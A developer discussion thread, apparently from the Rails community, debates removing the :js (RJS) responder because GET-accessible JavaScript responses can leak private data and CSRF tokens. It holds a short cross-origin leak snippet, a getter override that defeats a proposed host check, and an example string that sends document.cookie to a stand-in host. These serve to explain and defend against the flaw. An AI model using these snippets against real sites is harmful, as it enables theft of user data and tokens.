Remove :js responder

https://github.com/rails/rails/issues/12374#issuecomment-29446761

In the discussion linked above, I proposed deprecating the JS responder, because this technique is insecure and not a pragmatic way to transfer data.

It can be exploited as described here: http://homakov.blogspot.com/2013/05/do-not-use-rjs-like-techniques.html

I find this bug very often, so I know what I’m talking about. With it, an attacker can steal user data, and the authenticity_token as well if templates containing forms are leaked.

Removing it seems fine to me, but I suppose we should deprecate it first. Don’t people need to specifically say “render js: whatever”?

I think 100% of “render js:” cases can be implemented using JSON. But maybe I am wrong.
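As a rough sketch of what that translation looks like (the payload and the selector here are made up, not taken from any real app):

```ruby
require "json"

# Hypothetical payload; none of these names come from the thread.
comment = { id: 42, body: "Great post!" }

# RJS style: the server ships executable JavaScript for the browser to eval.
js_response = "$('#comments').append(#{comment[:body].to_json});"

# JSON style: the server ships inert data; client-side code decides how to render it.
json_response = JSON.generate(comment)

puts js_response    # $('#comments').append("Great post!");
puts json_response  # {"id":42,"body":"Great post!"}
```

The JSON variant moves the decision of what to do with the data out of the response and into the client-side code, which is the crux of the argument here.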

A lot of people use the js responder with ujs, but there are often bugs with how jQuery handles the automatic code execution of js ajax responses, so I agree, it’s something I wouldn’t mind deprecating.

One reason people tend to use js responders is to use js.erb to embed values from ruby into the returned js, but I think a better way to do this is to use json and HTML data attributes to embed values when necessary.
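A minimal sketch of the data-attribute approach described above (all names and values here are illustrative):

```ruby
require "json"
require "erb"

# Hypothetical values coming from Ruby that the client-side JS needs.
payload = { unread: 3, label: "new & improved" }

# Serialize to JSON, then HTML-escape so the result is safe inside an attribute.
attr_value = ERB::Util.html_escape(JSON.generate(payload))
html = %(<div id="inbox" data-state="#{attr_value}"></div>)

puts html
# Client-side code would read it back with something like:
#   JSON.parse(document.getElementById('inbox').dataset.state)
```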

I am not against removing this (I personally don’t have a use for it anymore), but the reasoning behind the removal seems unclear to me.

If it’s just “let’s remove this because no one uses it anymore” (and if that’s true), or “Rails wants to discourage this type of architecture in favour of moving this kind of processing to the client”, then fine. But I am not sure I fully understand the security angle here.

Specifically, in Egor’s blog post:

  1. "Broken concept & architecture. This feels as weird as the client-side sending code that is going to be evaled on the server-side… wait… Rails programmers had similar thing for a while :/"

But in the context of a web application, by definition you are always sending JavaScript code from your server to be eval()-ed in the client (browser) :slight_smile: Whether the code is in /assets/javascript or in your controller, there’s really no difference here.

So I’ll have to assume you are talking about eval()-ing code that contains user-supplied data that’s bad. Which is fair enough, considering there’s usually a safer way to do this (encoding the user-supplied data as JSON first).
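To illustrate what “encoding the user-supplied data as JSON first” buys you (the malicious value below is invented for the example):

```ruby
require "json"

# A made-up malicious value a user might submit.
user_input = %q{"; document.location = '//evil.test/?' + document.cookie; var x = "}

# Naive interpolation lets the value break out of the string literal:
unsafe = %(var name = "#{user_input}";)

# JSON-encoding first escapes the quotes, so the payload stays an inert string:
safe = %(var name = #{user_input.to_json};)

puts unsafe
puts safe
```

In the unsafe version the attacker’s code becomes executable statements; in the safe version the quotes are escaped and the whole thing remains a harmless string.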

But as Andrew pointed out on the GitHub issue, there might be legitimate use cases for returning code that does NOT contain user-supplied data. I think those use cases need to be understood properly (and we need to investigate/suggest alternatives for them) to ensure we are not removing a useful feature just because it’s subject to abuse.

  2. "Escaping user content and putting it into Javascript can be more painful and having more pitfalls then normal HTML escaping. … There can be more special characters and XSS you should care about."

Is this not already adequately addressed by the escaping helpers Rails provide? If so, regardless of whether we remove the js responder, those issues should be reported and fixed in Rails itself. I just opened https://github.com/rails/rails/pull/13073 yesterday to patch json_escape to make it useful again (please provide feedback), and I plan to submit another PR to improve the docs on escape_javascript to make the intended use cases more clear.

If it is already possible to correctly escape input for use in the JS responder, and it’s just difficult to do correctly, then the problem might not lie in the JS responder per se, and we should take this opportunity to address those difficulties.
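For context, the kind of escaping being discussed looks roughly like this. The real helper is ERB::Util.json_escape in Rails; the standalone version below is my own simplified sketch of the idea, not the actual Rails implementation:

```ruby
require "json"

# Simplified, standalone sketch of HTML-safe JSON escaping (my assumption of
# the idea behind ERB::Util.json_escape, not the real implementation).
JSON_ESCAPE = { "&" => '\u0026', ">" => '\u003e', "<" => '\u003c' }.freeze

def json_escape(json)
  json.gsub(/[&><]/) { |char| JSON_ESCAPE[char] }
end

data = JSON.generate(note: "</script><script>alert(1)</script>")
escaped = json_escape(data)

puts escaped
# No raw "<" or ">" remains, so the value cannot close an inline <script>
# tag, yet the string still parses as valid JSON.
```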

  3. "JSONP-like data leaking. If app accepts GET request and responds with Javascript containing private data in it attacker can use fake JS functions to leak data from the response."

I assume you are talking about CSRF-style attacks, where a page on a third-party domain makes requests to your site on your user’s behalf. But like you said, this problem also exists in JSONP. In fact, it’s probably much easier to exploit in JSONP (because you can control the name of the callback) than with a JS response that updates a certain part of the page. So I’m not sure this is really the JS responder’s fault. And like Andrew said, in his use case there’s nothing to leak.

Maybe I am not understanding this point correctly. If you can provide some examples based on the apps you see in the field it will be very helpful.

  4. "UPD as pointed out on HN evaling response will mess with your global namespace and there is no way to jump into closure you created request in…"

(I suppose this is not related to security.)

If you are doing a lot of client-side work, you should definitely architect your client-side JavaScript properly; on that I agree 100% (I mainly write full-blown single-page apps these days for my day job, so believe me when I say we are in agreement :). But in cases where you are delivering a small, simple payload to update a small part of the page, I don’t know that it’s evil enough to be strongly discouraged.

I don’t do this, so I’m not really in a good position to defend it. Again, maybe it’s just a case of “no one uses this anymore so it’s not worth supporting”, and that’s fine by me. But you brought up security, so I want to make sure we address your concerns properly.

Godfrey

I believe the primary use case for the js responder is remote forms, where you are not making the request yourself, so a js response is the simplest and most natural approach. This is not inherently insecure, so it should not be deprecated just because it doesn’t feel right to some.

A lot of the proposed issues aren’t really too bad IMO, they’re mainly just related to one developer’s preferences and taste over another. I personally don’t think returning JS from an ajax call is much (if any) worse than returning HTML. It’s all just your server rendering some markup/code for the browser to interpret.

However, from the UJS side, the main issue with using JS as the response is that the user has no control over the exact context of the automatic eval done by jQuery, or over exactly when during the callback sequence the code is eval’d. This actually caused code to break at one point due to a jQuery update, which would cause issues if your returned JS replaced the element that triggered the UJS remote (ajax) call. See:

https://github.com/rails/jquery-ujs/issues/223#issuecomment-2791098

That being said, I’m not necessarily in the “we should deprecate this” camp. I’m somewhat indifferent. Deprecation means one less thing to maintain (and would allow me to delete all of one line in UJS).

– Steve Schwartz

About the HTML rendering use case, I would point out that it could be adequately solved using render_to_string, and IMHO more elegantly, since the related JS could be included in the assets and organized together with the rest of the JS source.

I can’t think of any use case where RJS is preferable to render :json. Does anyone have one?

I am -1 for deprecating the js responders

Personally I find using js.erb templates much easier, more DRY, and more expressive than returning an HTML string as a JSON element. Any JavaScript in the js.erb should be specific to initializing the rendered HTML and would otherwise exist in the event handler of the AJAX call anyway, so having it in the assets seems of little benefit. All the reusable code should live in the assets either way.

It does not seem like removing it provides any benefit to the people who would prefer to use all JSON. So, other than forcing a preference on the community, why deprecate it?

To focus on the security concern, I repeat: any GET-accessible .js.erb IS a vulnerability, because it leaks all the data it contains.
All the “I use it because it’s fast/convenient” arguments mean nothing if the technique is vulnerable. IMO.

Normally it can be exploited this way:

```javascript
function $(){ return {html: function(){ console.log('LEAKED', arguments);}}};

document.write('<script src="http://SITE/objects.js"></script>')
```

Not only are js.erb templates not deprecated, they are a great way to develop an application with Ajax responses where you can reuse your server-side templates. It’s fine to explore ways to make this more secure by default, but the fundamental development style of returning JS as a response is both architecturally sound and an integral part of Rails. So that’s not going anywhere.

So let’s instead explore ways of having better escaping tools, warnings, or defaults that’ll work with the wonders of RJS.

@dhh, as I mentioned above, for GET requests this will always be a security breach. So leaving it for POST only? That doesn’t make sense.
Also https://twitter.com/homakov/status/406426491937759232

Right, I agree that if used incorrectly this can be a vector for CSRF attacks. But like you said, this is also a problem for JSONP, which is by far more popular. So unless we also remove JSONP, the problem you are complaining about is still there, no?

Maybe we should improve the documentation to point out that you should not be using cookies to authenticate “private” JSONP/JS endpoints? Perhaps we can make it easier to do token-based authentication for API requests?

Because personally I don’t see JSONP going away.

Godfrey

GET requests using Cookies for authentication. That returns non-public data.

It’s not a proper comparison. Nobody uses JSONP without a reason; autocomplete, at most. And the security concerns of JSONP are way better known than the RJS bug (have you seen any articles on this topic besides mine?)

Maybe we should improve the documentation to point out that you should not be using cookies to authenticate “private” JSONP/JS endpoints

IMO, it should be fixed somewhere in the code, not in the documentation. People don’t read it.

Not using cookies for JS responses breaks the idea of templating. For APIs people should use JSON. Why JS?

GET requests using Cookies for authentication. That returns non-public data.
Most of the time this is the case. JS templates return whole forms with the authenticity_token in them!

Thanks for the explanation. I now better understand the point you made in your original argument and the security concern you raised.

GET requests using Cookies for authentication. That returns non-public data.

most of the time this is the case. JS templates return whole forms with the authenticity_token in them!

My point here is not that “JS endpoints that use cookies and return private data” aren’t a common misuse; on that, I’m sure you are more qualified to give an opinion than I am, based on the apps you work on. My point is that I don’t think this is inherently flawed and fundamentally impossible to fix (and hence that we must remove it). Not using cookies for auth is one possible fix, but as you pointed out…

Not using cookies for JS responses breaks the idea of templating. For APIs people should use JSON. Why JS?

And I think you are quite right. Having to deal with an alternative authentication scheme that does not rely (only) on cookies, on both the client and the server side, probably cancels out a lot of the benefits of using JS responses (simplicity, etc.).

However, I think there is probably something else Rails can do to address the security concerns you have. For example, we could automatically wrap all JS responses with something like…

```javascript
if (<%= an_array_of_whitelisted_hosts %>.indexOf(window.location.host) !== -1) {
  // … the actual response goes here …
}
```

What do you think about this? It seems like it would be quite easy for Rails to implement. We could turn it on by default, with the list defaulting to request.host, and provide a way to opt out. Would that address your concerns?

Again, I personally don’t use this feature, so I don’t have a strong opinion on whether it should be kept in core. I’m just focusing on the security concerns you raised to see what we can do to make Rails better. And I suspect there are ways to make this feature more secure by default without removing it.

Godfrey

```javascript
location.__defineGetter__('host', function(){ return 'google.com' })
// => undefined
location.host
// => "google.com"
```

Since POSTs already require a CSRF token, the RJS calls should do the same thing. Make them require the auth token in the URL, or even better, have Rails generate a hash of the auth token and the URL and compare on the server. Thus you can’t call any RJS without using Rails helpers to generate the correct URL and matching token, and the new token would not leak the original CSRF token via the URL or referer. It’s effectively using methods similar to how we build APIs with HMAC signing of the request, but in a lightweight form and only in the background for RJS (or whatever else you want to protect, I suppose). This seems a little out of the scope of the core Rails project, though?
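A rough sketch of that signing idea (all names, the key handling, and the URL here are invented for illustration; in a real app the secret would come from the session, not a literal):

```ruby
require "openssl"

# Invented per-session secret; a real app would derive this from the session.
SECRET = "per-session-secret"

def sign_url(url, secret)
  OpenSSL::HMAC.hexdigest("SHA256", secret, url)
end

# Constant-time comparison so the signature can't be guessed byte by byte.
def secure_compare(a, b)
  return false unless a.bytesize == b.bytesize
  a.bytes.zip(b.bytes).map { |x, y| x ^ y }.sum.zero?
end

def valid_signature?(url, sig, secret)
  secure_compare(sign_url(url, secret), sig)
end

url = "/comments/42/edit.js"
signed_url = "#{url}?sig=#{sign_url(url, SECRET)}"

puts signed_url
puts valid_signature?(url, sign_url(url, SECRET), SECRET)  # true
```

Because the transmitted value is an HMAC of the URL rather than the CSRF token itself, leaking the signed URL via the referer does not leak the original token.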

Homakov,

Could what Godfrey suggests be implemented on the server side instead of the client side, so that it can’t be bypassed so easily?

We could raise an exception by default when the host is not allowed, assuming that request.host is trustworthy.
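A sketch of what raising by default might look like, under the post’s assumption that request.host can be trusted. The constant, error class, and method names are all hypothetical; in Rails this would sit in a before_action and read request.host:

```ruby
# Hypothetical whitelist of hosts we are willing to serve JS responses for.
ALLOWED_JS_HOSTS = ["example.com", "www.example.com"].freeze

class CrossOriginJsRequest < StandardError; end

# Raise unless the request's host is one we expect to serve JS to.
def verify_js_host!(host)
  unless ALLOWED_JS_HOSTS.include?(host)
    raise CrossOriginJsRequest, "refusing to render JS for #{host}"
  end
  true
end

puts verify_js_host!("example.com")                 # true
verify_js_host!("evil.test") rescue puts "blocked"  # blocked
```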